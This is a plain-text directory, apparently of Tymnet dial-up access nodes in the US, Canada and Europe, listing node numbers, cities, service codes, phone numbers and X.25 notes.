+10211 Norcross/Doraville   GA  USA  HIGH          C  404/455-9285 N TYM-X25
+10211 Doraville            GA  USA  HIGH          C  404/455-9285 N TYM-X25
+10211 Atlanta/Doraville    GA  USA  HIGH       C     404/455-7540 N TYM-X25
+10211 Doraville            GA  USA  HIGH       C     404/455-7540 N TYM-X25
+10211 Marietta/Doraville   GA  USA  HIGH       C     404/455-7540 N TYM-X25
+10211 Norcross/Doraville   GA  USA  HIGH       C     404/455-7540 N TYM-X25
+10212 Hamilton             OH  USA  LOW   B B        513/874-1744 N
+10213 Ocala                FL  USA  LOW   B B  C     904/732-3707 Y
+10217 Atlanta/Doraville    GA  USA  HIGH  B B  C     404/451-3362 Y
+10217 Doraville            GA  USA  HIGH  B B  C     404/451-3362 Y
+10217 Marietta/Doraville   GA  USA  HIGH  B B  C     404/451-3362 Y
+10217 Norcross/Doraville   GA  USA  HIGH  B B  C     404/451-3362 Y
+10233 Cleveland            OH  USA  HIGH  B B  C     216/861-6709 Y
+10234 Cleveland            OH  USA  HIGH       C  C  216/696-0363 N TYM-X25
+10242 San Jose             CA  USA  HIGH          C  408/954-8481 N TYM-X25
+10242 Los Altos/San Jose   CA  USA  HIGH          C  408/954-8481 N TYM-X25
+10242 Santa Clara/San Jose CA  USA  HIGH          C  408/954-8481 N TYM-X25
+10242 Sunnyvale/San Jose   CA  USA  HIGH          C  408/954-8481 N TYM-X25
+10242 San Jose             CA  USA  HIGH       C     408/954-8476 N TYM-X25
+10242 Los Altos/San Jose   CA  USA  HIGH       C     408/954-8476 N TYM-X25
+10242 Santa Clara/San Jose CA  USA  HIGH       C     408/954-8476 N TYM-X25
+10242 Sunnyvale/San Jose   CA  USA  HIGH       C     408/954-8476 N TYM-X25
+10243 Huntington           WV  USA  LOW   B B  C     304/529-2091 Y
+10250 Inglewood/Vernon     CA  USA  HIGH  B B  C     213/587-7514 Y
+10250 Los Angeles/Vernon   CA  USA  HIGH  B B  C     213/587-7514 Y
+10250 Vernon               CA  USA  HIGH  B B  C     213/587-7514 Y
+10254 Atlanta/Doraville    GA  USA  HIGH          C  404/451-1546 Y
+10254 Doraville            GA  USA  HIGH          C  404/451-1546 Y
+10254 Marietta/Doraville   GA  USA  HIGH          C  404/451-1546 Y
+10254 Norcross/Doraville   GA  USA  HIGH          C  404/451-1546 Y
+10255 Laredo               TX  USA  LOW   B B  C     512/727-8308 Y
+10256 Hampton              VA  USA  MED   B B  C     804/727-0572 Y
+10261 Sheboygan            WI  USA  LOW   B B  C     414/457-6128 Y
+10264 Pittsburgh           PA  USA  HIGH          C  412/642-7703 N TYM-X25
+10264 Pittsburgh           PA  USA  HIGH       C     412/642-2386 N TYM-X25
+10267 Springfield          MA  USA  MED   B B  C     413/787-0048 Y
+10267 Holyoke/Springfield  MA  USA  MED   B B  C     413/787-0048 Y
+10274 Tucson               AZ  USA  MED   B B  C     602/297-2239 Y
+10301 Abilene              TX  USA  LOW   B B  C     915/676-0091 Y
+10305 Gadsden              AL  USA  LOW   B B  C     205/543-3550 Y
+10307 Ann Arbor            MI  USA  MED   B B  C     313/973-7935 Y
+10317 Kenosha              WI  USA  LOW   B B  C     414/553-9044 Y
+10317 Racine/Kenosha       WI  USA  LOW   B B  C     414/553-9044 Y
+10320 Iowa City            IA  USA  LOW   B B  C     319/354-3633 Y
+10325 Inglewood/Vernon     CA  USA  HIGH  B B  C     213/587-7514 Y
+10325 Los Angeles/Vernon   CA  USA  HIGH  B B  C     213/587-7514 Y
+10325 Vernon               CA  USA  HIGH  B B  C     213/587-7514 Y
+10334 Monterey             CA  USA  LOW   B B  C     408/375-2644 Y
+10337 Louisville           KY  USA  MED   B B        502/499-7110 N
+10346 Portsmouth/Norfolk   VA  USA  MED   B B  C     804/857-0148 Y
+10346 Virginia Bch/Norfolk VA  USA  MED   B B  C     804/857-0148 Y
+10346 Norfolk              VA  USA  MED   B B  C     804/857-0148 Y
+10355 Longwood/Orlando     FL  USA  MED           C  407/839-0555 Y
+10355 Orlando              FL  USA  MED           C  407/839-0555 Y
+10361 Alexandria/Fairfax   VA  USA  HIGH  B B  C     703/352-3136 Y
+10361 Arlington/Fairfax    VA  USA  HIGH  B B  C     703/352-3136 Y
+10361 Fairfax              VA  USA  HIGH  B B  C     703/352-3136 Y
+10361 Washington/Fairfax   DC  USA  HIGH  B B  C     703/352-3136 Y
+10361 Bethesda/Fairfax     MD  USA  HIGH  B B  C     703/352-3136 Y
+10363 El Segundo           CA  USA  MED   B B  C     310/643-4228 Y
+10363 Mar Vista/El Segundo CA  USA  MED   B B  C     310/643-4228 Y
+10363 MarinaDelRey/El Sgnd CA  USA  MED   B B  C     310/643-4228 Y
+10363 Santa Monica/El Sgnd CA  USA  MED   B B  C     310/643-4228 Y
+10402 Rockville            MD  USA  LOW   B B  C     301/294-4522 Y
+10404 Lyon                     FRA  E1    C C  C     (7) 8478144  Y
+10430 Inglewood/Vernon     CA  USA  HIGH  B B  C     213/587-7514 Y
+10430 Los Angeles/Vernon   CA  USA  HIGH  B B  C     213/587-7514 Y
+10430 Vernon               CA  USA  HIGH  B B  C     213/587-7514 Y
+10436 Concord/Walnut Creek CA  USA  LOW   B B  C     510/935-1507 Y
+10436 Pacheco/Walnut Creek CA  USA  LOW   B B  C     510/935-1507 Y
+10436 Pleasnthill/Walnt Ck CA  USA  LOW   B B  C     510/935-1507 Y
+10436 Walnut Creek         CA  USA  LOW   B B  C     510/935-1507 Y
+10464 Quebec City          QU  CAN  CANH  C C  C     418/647-1116 Y
+10467 Colorado Springs     CO  USA  MED   B B  C     719/590-1003 Y
+10470 Arlington/Fort Worth TX  USA  MED   B B  C     817/332-9397 Y
+10470 Fort Worth           TX  USA  MED   B B  C     817/332-9397 Y
+10472 Windsor              NY  USA  LOW   B B        914/561-9103 N
+10506 Johnson City         TN  USA  LOW   B B  C     615/928-9544 Y
+10516 Charlottesville      VA  USA  LOW   B B  C     804/977-5661 Y
+10526 Houston              TX  USA  HIGH  B B  C     713/496-1332 Y
+10542 McKinney             TX  USA  LOW   B B  C     214/542-2641 Y
+10543 Akron                OH  USA  MED   B B        216/376-6227 N
+10552 Salem                OR  USA  LOW   B B  C     503/370-4314 Y
+10560 Muncie               IN  USA  LOW   B B  C     317/281-9021 Y
+10567 Durham               NC  USA  HIGH  B B  C     919/549-9025 Y
+10567 Chapel Hill/Durham   NC  USA  HIGH  B B  C     919/549-9025 Y
+10570 Bozeman              MT  USA  LOW   B B  C     406/585-9719 Y
+10574 Hilo                 HI  USA  MED   B B  C     808/935-5717 N
+10601 Augusta              ME  USA  LOW   B B  C     207/622-3083 Y
+10602 Cape Girardeau       MO  USA  LOW   B B  C     314/335-1518 Y
+10603 Elyria               OH  USA  LOW   B B  C     216/324-7156 Y
+10604 Florence             SC  USA  LOW   B B  C     803/664-0550 Y
+10605 Kingston             NY  USA  LOW   B B  C     914/336-2790 Y
+10612 Montreal/St. Laurent QU  CAN  CANH  C C  C     514/747-2996 Y
+10612 St. Laurent          QU  CAN  CANH  C C  C     514/747-2996 Y
+10615 Secane               PA  USA  LOW   B B  C     215/543-3045 Y
+10621 Princeton/So. Brnswk NJ  USA  HIGH  B B        609/452-1018 N
+10621 South Brunswick      NJ  USA  HIGH  B B        609/452-1018 N
+10622 South Brunswick      NJ  USA  HIGH  B B  C     609/452-9529 Y
+10622 Princeton/So. Brnswk NJ  USA  HIGH  B B  C     609/452-9529 Y
+10631 Honolulu             HI  USA  MED   B B        808/545-7610 N
+10632 Honolulu             HI  USA  MED        C     808/528-5300 Y
+10665 Tulsa                OK  USA  HIGH  B B  C     918/585-2706 Y
+10666 Tulsa                OK  USA  HIGH  B B  C     918/585-2706 Y
+10673 Springfield          MO  USA  LOW   B B  C     417/881-6225 Y
+10703 Tortola                  VGB  3     C C  C     809/494-3993 N TYMUSA
+10705 Atlanta/Doraville    GA  USA  HIGH  B B        404/451-2208 N
+10705 Doraville            GA  USA  HIGH  B B        404/451-2208 N
+10705 Marietta/Doraville   GA  USA  HIGH  B B        404/451-2208 N
+10705 Norcross/Doraville   GA  USA  HIGH  B B        404/451-2208 N
+10710 New York             NY  USA  HIGH  B B        212/943-4700 N
+10713 Houston              TX  USA  HIGH          C  713/870-8381 Y
+10726 Winnipeg             MB  CAN  CANH                          N
+10727 Lawton               OK  USA  LOW   B B  C     405/353-6987 Y
+10730 Grand Island         NE  USA  LOW   B B  C     308/382-3176 Y
+10750 Steubenville/Wntsvl  OH  USA  LOW   B B  C     614/284-0020 Y
+10750 Wintersville         OH  USA  LOW   B B  C     614/284-0020 Y
+10753 El Segundo           CA  USA  MED   B B  C     310/643-4228 Y
+10753 Mar Vista/El Segundo CA  USA  MED   B B  C     310/643-4228 Y
+10753 MarinaDelRey/El Sgnd CA  USA  MED   B B  C     310/643-4228 Y
+10753 Santa Monica/El Sgnd CA  USA  MED   B B  C     310/643-4228 Y
+11003 Bangor               ME  USA  LOW   B B  C     207/990-0529 Y
+11010 Southfield           MI  USA  MED           C  313/557-2106 Y
+11012 Lincoln              NE  USA  LOW   B B  C     402/464-6235 Y
+11013 Eugene               OR  USA  LOW   B B  C     503/343-0044 Y
+11013 Springfield/Eugene   OR  USA  LOW   B B  C     503/343-0044 Y
+11014 Waco                 TX  USA  LOW   B B  C     817/776-0880 Y
+11015 Killeen              TX  USA  LOW   B B  C     817/526-8118 Y
+11026 Slidell              LA  USA  LOW   B B  C     504/646-2900 Y
+11030 Atlanta/Doraville    GA  USA  HIGH  B B        404/451-2208 N
+11030 Doraville            GA  USA  HIGH  B B        404/451-2208 N
+11030 Marietta/Doraville   GA  USA  HIGH  B B        404/451-2208 N
+11030 Norcross/Doraville   GA  USA  HIGH  B B        404/451-2208 N
+11035 Clearwater           FL  USA  MED   B B  C     813/441-1621 Y
+11035 St. Petersbrg/Clrwtr FL  USA  MED   B B  C     813/441-1621 Y
+11052 Eureka               CA  USA  LOW   B B  C     707/445-3021 Y
+11053 Provo                UT  USA  LOW   B B        801/373-2192 N
+11054 Corpus Christi       TX  USA  MED           C  512/289-1981 Y
+11061 Hong Kong                HKG  HK    C C  C     877-2602     N
+11063 Cumberland           MD  USA  LOW   B B  C     301/777-9320 Y
+11067 Auburn               ME  USA  LOW   B B  C     207/795-6013 Y
+11067 Lewiston/Auburn      ME  USA  LOW   B B  C     207/795-6013 Y
+11074 London                   GBR  E1    C C  C     (81)566-7260 Y
+11100 Naples               FL  USA  LOW   B B  C     813/434-8080 Y
+11105 Memphis              TN  USA  MED   B B  C     901/527-8122 Y
+11107 Vancouver            BC  CAN  HIG           C  604/682-6054 N TYM-X25
+11110 Dusseldorf               FRG  E1    C C  C     (211)596871  Y
+11114 Calgary              AB  CAN  CANH          C  403/264-5472 Y
+11120 El Paso              TX  USA  MED   B B  C     915/533-1453 Y
+11121 El Paso              TX  USA  MED   B B  C     915/533-1453 Y
+11123 Buffalo              NY  USA  MED   B B  C     716/893-1014 Y
+11130 Houston              TX  USA  HIGH  B B  C     713/496-1332 Y
+11141 Amsterdam                NLD  E1               2041290546   N DN-1
+11144 Grand Rapids         MI  USA  MED           C  616/458-9252 N
+11150 Chicago              IL  USA  WATS  B B  C     800/###-#### Y
+11151 Chicago              IL  USA  WATS  B B  C     800/###-#### Y
+11152 Chicago              IL  USA  WATS  B B  C     800/###-#### Y
+11156 Alexandria/Fairfax   VA  USA  HIGH  B B  C     703/352-3136 Y
+11156 Arlington/Fairfax    VA  USA  HIGH  B B  C     703/352-3136 Y
+11156 Fairfax              VA  USA  HIGH  B B  C     703/352-3136 Y
+11156 Washington/Fairfax   DC  USA  HIGH  B B  C     703/352-3136 Y
+11156 Bethesda/Fairfax     MD  USA  HIGH  B B  C     703/352-3136 Y
+11160 Chicago              IL  USA  WATS          C  800/###-#### Y
+11161 Winston-Salem        NC  USA  MED   B B  C     919/765-1221 Y
+11162 Charleston           SC  USA  LOW   B B  C     803/553-0860 Y
+11207 O'Fallon             IL  USA  LOW   B B  C     618/632-3993 Y
+11223 London                   GBR  E1    C C  C     (71)489-8571 N
+11224 Monterey             CA  USA  LOW   B B  C     408/375-2644 Y
+11225 London                   GBR  E1    C C  C     (71)489-8571 N
+11231 Lancaster            PA  USA  LOW   B B  C     717/569-1081 Y
+11236 Lansing              MI  USA  MED   B B  C     517/484-5344 Y
+11237 Columbia             SC  USA  MED   B B  C     803/254-7563 Y
+11240 Greenville           SC  USA  MED   B B  C     803/271-9213 Y
+11241 Mobile               AL  USA  MED   B B  C     205/460-2515 Y
+11242 Lake Zurich/Palatine IL  USA  LOW   B B  C     708/991-7171 Y
+11242 Palatine             IL  USA  LOW   B B  C     708/991-7171 Y
+11251 Denton               TX  USA  LOW   B B  C     817/565-0552 Y
+11252 Vancouver            WA  USA  LOW   B B  C     206/574-0427 Y
+11257 Little Rock          AR  USA  MED   B B  C     501/666-6886 Y
+11266 Fort Collins         CO  USA  LOW   B B  C     303/224-9819 Y
+11267 Amarillo             TX  USA  LOW   B B  C     806/355-7088 Y
+11270 San Rafael           CA  USA  LOW   B B  C     415/453-2087 Y
+11271 Cathedral City       CA  USA  LOW   B B  C     619/324-0920 Y
+11271 Palm Sprngs/Cath Cty CA  USA  LOW   B B  C     619/324-0920 Y
+11272 Moorpark             CA  USA  LOW   B B  C     805/523-0203 Y
+11273 San Clemente         CA  USA  LOW   B B  C     714/240-9424 Y
+11274 Mishawaka/South Bend IN  USA  MED   B B  C     219/234-6410 Y
+11274 South Bend           IN  USA  MED   B B  C     219/234-6410 Y
+11275 Bridgeport           CT  USA  MED   B B  C     203/332-7256 Y
+11275 Stratford/Bridgeport CT  USA  MED   B B  C     203/332-7256 Y
+11276 Syracuse             NY  USA  MED   B B  C     315/433-1593 Y
+11277 Alexandria/Fairfax   VA  USA  HIGH  B B  C     703/352-3136 Y
+11277 Arlington/Fairfax    VA  USA  HIGH  B B  C     703/352-3136 Y
+11277 Fairfax              VA  USA  HIGH  B B  C     703/352-3136 Y
+11277 Washington/Fairfax   DC  USA  HIGH  B B  C     703/352-3136 Y
+11277 Bethesda/Fairfax     MD  USA  HIGH  B B  C     703/352-3136 Y
+11300 Toledo               OH  USA  MED   B B  C     419/255-7705 Y
+11301 Harrisburg/Lemoyne   PA  USA  MED   B B  C     717/975-9881 Y
+11301 Lemoyne              PA  USA  MED   B B  C     717/975-9881 Y
+11304 Newark/Wilmington    DE  USA  MED   B B  C     302/652-2036 Y
+11304 Wilmington           DE  USA  MED   B B  C     302/652-2036 Y
+11305 Lyndhurst/Union City NJ  USA  HIGH          C  201/617-9069 Y
+11305 Union City           NJ  USA  HIGH          C  201/617/9069 Y
+11305 Union City           NJ  USA  HIGH          C  201/617-9110 N TYM-X25
+11305 Lyndhurst/Union City NJ  USA  HIGH          C  201/617-9110 N TYM-X25
+11305 Lyndhurst/Union City NJ  USA  HIGH       C     201/617-9103 N TYM-X25
+11305 Union City           NJ  USA  HIGH       C     201/617-9103 N TYM-X25
+11306 Holyoke/Springfield  MA  USA  MED   B B  C     413/787-0048 Y
+11306 Springfield          MA  USA  MED   B B  C     413/787-0048 Y
+11307 Rockford             IL  USA  MED   B B  C     815/633-2080 Y
+11313 Little Rock          AR  USA  MED           C  501/666-1224 Y
+11314 Alameda/Oakland      CA  USA  HIGH          C  510/638-7904 Y
+11314 Berkeley/Oakland     CA  USA  HIGH          C  510/638-7904 Y
+11314 Hayward/Oakland      CA  USA  HIGH          C  510/638-7904 Y
+11314 Oakland              CA  USA  HIGH          C  510/638-7904 Y
+11315 Oakridge             TN  USA  LOW   B B  C     615/482-1466 Y
+11321 Northport            AL  USA  LOW   B B  C     205/758-1116 Y
+11321 Tuscaloosa/Northport AL  USA  LOW   B B  C     205/758-1116 Y
+11322 Augusta/Martinez     GA  USA  LOW   B B  C     404/855-0442 Y
+11322 Martinez             GA  USA  LOW   B B  C     404/855-0442 Y
+11323 Owensboro            KY  USA  LOW   B B  C     502/685-0959 Y
+11326 Toronto              ON  CAN  CANH          C  416/361-3028 Y
+11326 Toronto              ON  CAN  CANH       C  C  416/361-3383 N TYM-X25
+11331 Midlothian/Richmond  VA  USA  MED   B B  C     804/330-2673 Y
+11331 Richmond             VA  USA  MED   B B  C     804/330-2673 Y
+11346 Ft. Lauderdale       FL  USA  MED           C  305/779-3445 Y
+11346 Ft. Lauderdale       FL  USA  MED   B B  C     305/467-1870 Y
+11346 Hollywd/Ft. Laudrdle FL  USA  MED           C  305/779-3445 Y
+11346 Hollywd/Ft. Laudrdle FL  USA  MED   B B  C     305/467-1870 Y
+11346 Pompno Bch/Fr. Ldrdl FL  USA  MED   B B  C     305/467-1870 Y
+11346 Pompno Bch/Ft. Ldrdl FL  USA  MED           C  305/779-3445 Y
+11356 Asheville            NC  USA  LOW   B B  C     704/253-8945 Y
+11361 London                   GBR  E1    C C  C     (81)566-7260 Y
+11362 Stamford             CT  USA  HIGH  B B  C     203/327-2974 Y
+11371 Santa Barbara        CA  USA  MED   B B        805/564-2354 N
+11372 Santa Barbara        CA  USA  MED   B B  C     805/965-1612 Y
+11376 New Orleans          LA  USA  HIGH          C  504/524-1738 Y
+11402 Modesto              CA  USA  LOW   B B  C     209/527-0150 Y
+11405 Marlborough          MA  USA  LOW   B B  C     508/481-0026 Y
+11447 Seattle              WA  USA  HIGH  B B  C     206/281-7141 Y
+11447 Bellevue/Seattle     WA  USA  HIGH  B B  C     206/281-7141 Y
+11451 Battle Creek         MI  USA  LOW   B B  C     616/964-9303 Y
+11452 Harrisonburg         VA  USA  LOW   B B  C     703/433-6333 Y
+11453 Groton               MA  USA  LOW   B B  C     508/448-9361 Y
+11460 Chicago              IL  USA  HIGH          C  312/427-1506 N TYM-X25
+11460 Chicago              IL  USA  HIGH       C     312/427-1453 N TYM-X25
+11465 Munich                   FRG  E1    C C  C     (89)129-6081 Y
+11471 Clarksburg           WV  USA  LOW   B B  C     304/624-1451 Y
+11500 Salt Lake City       UT  USA  HIGH          C  801/364-7605 Y
+11500 Salt Lake City       UT  USA  HIGH          C  801/364-7439 N TYM-X25
+11500 Salt Lake City       UT  USA  HIGH       C     801/364-7451 N TYM-X25
+11646 Hazelwood            MO  USA  HIGH  B B  C     314/731-8283 Y
+11646 St. Louis            MO  USA  HIGH  B B  C     314/731-8283 Y
+11646 Bridgeton/St. Louis  MO  USA  HIGH  B B  C     314/731-8283 Y
+11652 Tampa                FL  USA  HIGH          C  813/933-7095 N TYM-X25
+11652 Tampa                FL  USA  HIGH       C     813/933-7303 N TYM-X25
+11671 Rochester            MN  USA  LOW   B B  C     507/282-0830 Y
+11702 Georgetown           DE  USA  LOW   B B  C     302/856-1788 Y
+11716 Greensburg           PA  USA  LOW   B B  C     412/838-1920 Y
+11716 Latrobe/Greensburg   PA  USA  LOW   B B  C     412/838-1920 Y
+11727 Huntsville           AL  USA  MED           Y  205/882-9199 Y
+11730 Alhambra             CA  USA  MED   B B  C     818/308-1800 Y
+11730 Arcadia/Alhambra     CA  USA  MED   B B  C     818/308-1800 Y
+11730 El Monte/Alhambra    CA  USA  MED   B B  C     818/308-1800 Y
+11730 Pasadena/Alhambra    CA  USA  MED   B B  C     818/308-1800 Y
+11732 Zurich                   CHE  E1    C C  C     (1) 837-0301 Y
+11736 Leeds                    GBR  E1         C     (532) 341838 Y
+11741 Duluth               MN  USA  LOW   B B  C     218/722-0655 Y
+11743 Northfield           IL  USA  LOW   B B  C     708/501-4536 Y
+11744 Bristol                  GBR  E1         C     (272) 255392 Y
+11745 Hamburg                  FRG  E1    C C  C     (40)251-4037 Y
+11752 West Bend            WI  USA  LOW   B B  C     414/334-1755 Y
+11753 St. Cloud            MN  USA  LOW   B B  C     612/656-1280 Y
+11754 Victoria             TX  USA  LOW   B B  C     512/576-9200 Y
+11764 Portsmouth/Norfolk   VA  USA  MED   B B  C     804/857-0148 Y
+11764 Virginia Bch/Norfolk VA  USA  MED   B B  C     804/857-0148 Y
+11764 Norfolk              VA  USA  MED   B B  C     804/857-0148 Y
+12026 Columbia             MO  USA  LOW   B B  C     314/875-5570 Y
+12031 Presque Isle         ME  USA  LOW   B B  C     207/764-4167 Y
+12044 New Haven            CT  USA  MED           C  203/789-1848 Y
+12045 Memphis              TN  USA  MED           C  901/521-1303 Y
+12054 Fayetteville         NC  USA  LOW   B B  C     919/424-9610 Y
+12063 St. Louis            MO  USA  HIGH  B B  C     314/731-8283 Y
+12063 Bridgeton/St. Louis  MO  USA  HIGH  B B  C     314/731-8283 Y
+12066 Nashville            TN  USA  HIGH  B B  C     615/889-5790 Y
+12101 Belleville/O'Fallon  IL  USA  LOW   B B  C     618/632-3993 Y
+12150 Gary                 IN  USA  LOW   B B  C     219/884-7450 Y
+12150 Hammond/Gary         IN  USA  LOW   B B  C     219/884-7450 Y
+12150 Highland/Gary        IN  USA  LOW   B B  C     219/884-7450 Y
+12151 Gary                 IN  USA  LOW   B B  C     219/884-7450 Y
+12151 Hammond/Gary         IN  USA  LOW   B B  C     219/884-7450 Y
+12151 Highland/Gary        IN  USA  LOW   B B  C     219/884-7450 Y
+12161 Rotterdam                NLD  E1    C C  C  C  (10) 4530099 Y
+12161 Rotterdam                NLD  E1         C     (10) 4524923 N HSA
+12161 Rotterdam                NLD  E1    C C  C  C  (10) 4532002 Y
+12201 Washington/Fairfax   DC  USA  HIGH  B B        703/691-8200 N
+12201 Bethesda/Fairfax     VA  USA  HIGH  B B        703/691-8200 N
+12201 Alexandria/Fairfax   VA  USA  HIGH  B B        703/691-8200
+12201 Arlington/Fairfax    VA  USA  HIGH  B B        703/691-8200
+12201 Fairfax              VA  USA  HIGH  B B        703/691-8200
+12263 Lakeland             FL  USA  LOW   B B  C     813/858-6970 Y
+12263 Winterhaven/Lakeland FL  USA  LOW   B B  C     813/858-6970 Y
+12314 Freeland             MI  USA  LOW   B B  C     517/695-6751 Y
+12314 Midland/Freeland     MI  USA  LOW   B B  C     517/695-6751 Y
+12314 Saginaw/Freeland     MI  USA  LOW   B B  C     517/695-6751 Y
+12361 Aurora/Denver        CO  USA  HIGH  B B  C     303/832-3447 Y
+12361 Boulder/Denver       CO  USA  HIGH  B B  C     303/832-3447 Y
+12361 Denver               CO  USA  HIGH  B B  C     303/832-3447 Y
+12371 Bremen                   FRG  E1    C C  C     (421) 170997 Y
+12425 El Centro            CA  USA  LOW   B B  C     619/352-5823 Y
+12456 Fairfield            CA  USA  LOW   B B  C     707/421-0106 Y
+12460 Victorville          CA  USA  LOW   B B  C     619/955-7050 Y
+12513 Tallahassee          FL  USA  MED           C  904/422-0016 Y
+12513 Tallahassee          FL  USA  MED   B B  C     904/422-0149 Y
+12514 Jacksonville         FL  USA  MED   B B  C     904/721-8559 Y
+12516 Watertown            NY  USA  LOW   B B  C     315/788-1816 Y
+12533 Lancaster            CA  USA  LOW   B B  C     805/945-4962 Y
+12534 Maui                 HI  USA  LOW   B B  C     808/661-7688 Y
+12600 Meriden              CT  USA  LOW   B B  C     203/686-1238 Y
+12600 Middletown/Meriden   CT  USA  LOW   B B  C     203/686-1238 Y
+12601 Aiken                SC  USA  LOW   B B  C     803/648-0237 Y
+12611 London               ON  CAN  CANL  C C  C     519/641-8362 Y
+12620 Honolulu             HI  USA  MED        C     808/528-5300 Y
+12621 Paducah              KY  USA  LOW   B B  C     502/443-1086 Y
+12622 Dover                DE  USA  LOW   B B  C     302/678-3569 Y
+12624 Marysville           CA  USA  LOW   B B  C     916/749-8015 Y
+12626 Great Falls          MT  USA  LOW   B B  C     406/727-9510 Y
+12642 Los Gatos            CA  USA  LOW   B B  C     408/356-1818 Y
+12650 Paris                    FRA  E1    C C  C     (1)47728080  Y
+12720 Birmingham           AL  USA  HIGH  B B  C     205/942-7898 Y
+12732 Midland              TX  USA  LOW   B B  C     915/561-8401 Y
+12732 Odessa/Midland       TX  USA  LOW   B B  C     915/561-8401 Y
+12742 Zanesville           FL  USA  LOW   B B  C     614/454-2893 Y new svc
+12755 Bismark              ND  USA  LOW   B B  C     701/223-5165 Y
+13010 Houston              TX  USA  HIGH  B B  C     713/496-1332 Y
+13026 Spokane              WA  USA  MED   B B  C     509/747-3011 Y
+13103 Sarasota             FL  USA  LOW   B B  C     813/952-9000 Y
+13104 Goteborg                 SWE  E2    C C  C     (31)450630   Y
+13110 Rochester            MN  USA  LOW   B B  C     507/282-0830 Y
+13120 Dallas               TX  USA  HIGH  B B  C     214/630-5516 Y
+13121 Downrs Grove/Gln Eln IL  USA  MED   B B  C     708/790-4955 Y
+13121 Glen Ellyn           IL  USA  MED   B B  C     708/790-4955 Y
+13121 Wheaton/Glen Ellyn   IL  USA  MED   B B  C     708/790-4955 Y
+13123 Knoxville            TN  USA  MED   B B  C     615/694-0156 Y
+13132 Alexandria/Fairfax   VA  USA  HIGH  B B  C     703/352-3136 Y
+13132 Arlington/Fairfax    VA  USA  HIGH  B B  C     703/352-3136 Y
+13132 Fairfax              VA  USA  HIGH  B B  C     703/352-3136 Y
+13132 Washington/Fairfax   DC  USA  HIGH  B B  C     703/352-3136 Y
+13132 Bethesda/Fairfax     MD  USA  HIGH  B B  C     703/352-3136 Y
+13133 Alexandria/Fairfax   VA  USA  HIGH  B B  C     703/352-3136 Y
+13133 Arlington/Fairfax    VA  USA  HIGH  B B  C     703/352-3136 Y
+13133 Fairfax              VA  USA  HIGH  B B  C     703/352-3136 Y
+13133 Washington/Fairfax   DC  USA  HIGH  B B  C     703/352-3136 Y
+13133 Bethesda/Fairfax     MD  USA  HIGH  B B  C     703/352-3136 Y
+13134 Baton Rouge          LA  USA  MED   B B  C     504/291-0967 Y
+13154 Brookfield           WI  USA  HIGH  B B  C     414/785-0630 Y
+13154 Milwaukee/Brookfield WI  USA  HIGH  B B  C     414/785-0630 Y
+13156 Alexandria           LA  USA  LOW   B B  C     318/445-1800 Y
+13164 Sioux City           IA  USA  LOW   B B  C     712/255-3834 Y
+13171 Upland               CA  USA  LOW   B B  C     714/985-1153 Y
+13172 Gulfport             MS  USA  LOW   B B  C     601/864-9441 Y
+13173 Lawrence             KS  USA  LOW   B B  C     913/843-4870 Y
+13177 Wilmington           NC  USA  LOW   B B  C     919/392-7913 Y
+13213 Edmunton             AB  CAN        C C  C     403/484-4404 Y
+13214 Indianapolis         IN  USA  HIGH  B B  C     317/632-6408 Y
+13215 Petersburg           VA  USA  LOW   B B  C     804/861-1788 Y
+13216 Vineland             NJ  USA  LOW   B B  C     609/692-8943 Y
+13224 Frankfurt                FRG  E1    C C  C     (69)507-6736 Y
+13226 Newark               NJ  USA  HIGH  B B  C     201/824-3044 Y
+13226 Elizabeth/Newark     NJ  USA  HIGH  B B  C     201/824-3044 Y
+13226 Jersey City/Newark   NJ  USA  HIGH  B B  C     201/824-3044 Y
+13226 Union/Newark         NJ  USA  HIGH  B B  C     201/824-3044 Y
+13227 Newark               NJ  USA  HIGH  B B  C     201/824-3044 Y
+13227 Elizabeth/Newark     NJ  USA  HIGH  B B  C     201/824-3044 Y
+13227 Jersey City/Newark   NJ  USA  HIGH  B B  C     201/824-3044 Y
+13227 Union/Newark         NJ  USA  HIGH  B B  C     201/824-3044 Y
+13230 Miami                FL  USA  HIGH  B B  C     305/599-2900 Y
+13231 Hempstead            NY  USA  MED   B B  C     516/485-7422 Y
+13231 Mineola/Hempstead    NY  USA  MED   B B  C     516/485-7422 Y
+13233 New York             NY  USA  HIGH  B B  C     212/809-9660 Y
+13234 New York             NY  USA  HIGH  B B  C     212/809-9660 Y
+13235 New York             NY  USA  HIGH  B B  C     212/809-9660 Y
+13236 New York             NY  USA  HIGH  B B  C     212/809-9660 Y
+13240 Tampa                FL  USA  HIGH  B B  C     813/933-6210 Y
+13242 Morristown           NJ  USA  LOW   B B  C     201/539-1222 Y
+13244 Pueblo               CO  USA  LOW   B B  C     719/543-9712 Y
+13245 Norristown           PA  USA  MED   B B  C     215/666-9190 Y
+13246 Salt Lake City       UT  USA  HIGH  B B  C     801/533-8152 Y
+13247 Baton Rouge          LA  USA  MED   B B  C     504/291-0967 Y
+13251 Newport Beach        CA  USA  HIGH  B B  C     714/852-8141 Y
+13251 Anaheim/Newprt Beach CA  USA  HIGH  B B  C     714/852-8141 Y
+13251 Irvine/Newport Beach CA  USA  HIGH  B B  C     714/852-8141 Y
+13251 Santa Ana/Newprt Bch CA  USA  HIGH  B B  C     714/852-8141 Y
+13252 Newport Beach        CA  USA  HIGH  B B  C     714/852-8141 Y
+13252 Anaheim/Newprt Beach CA  USA  HIGH  B B  C     714/852-8141 Y
+13252 Irvine/Newport Beach CA  USA  HIGH  B B  C     714/852-8141 Y
+13252 Santa Ana/Newprt Bch CA  USA  HIGH  B B  C     714/852-8141 Y
+13253 Longwood/Orlando     FL  USA  MED   B B  C     407/841-0217 Y
+13253 Orlando              FL  USA  MED   B B  C     407/841-0217 Y
+13256 Temple               TX  USA  LOW   B B  C     817/773-2545 Y
+13273 Downrs Grove/Gln Eln IL  USA  MED   B B  C     708/790-4955 Y
+13273 Glen Ellyn           IL  USA  MED   B B  C     708/790-4955 Y
+13273 Wheaton/Glen Ellyn   IL  USA  MED   B B  C     708/790-4955 Y
+13300 New Orleans          LA  USA  HIGH  B B  C     504/525-2014 Y
+13301 New Orleans          LA  USA  HIGH  B B  C     504/525-2014 Y
+13314 Frederick/Myersville MD  USA  LOW   B B  C     301/293-9504 Y
+13314 Hagerstown/Myersvill MD  USA  LOW   B B  C     301/293-9504 Y
+13314 Myersville           MD  USA  LOW   B B  C     301/293-9504 Y
+13334 Toulouse                 FRA  E1    C C  C     (61) 300291  Y
+13341 Hull/Ottawa          ON  CAN  CANH  C C  C     613/563-2910 N
+13341 Ottawa               ON  CAN  CANH  C C  C     613/563-2910 N
+13344 Bellingham           WA  USA  LOW   B B  C     206/671-7750 Y
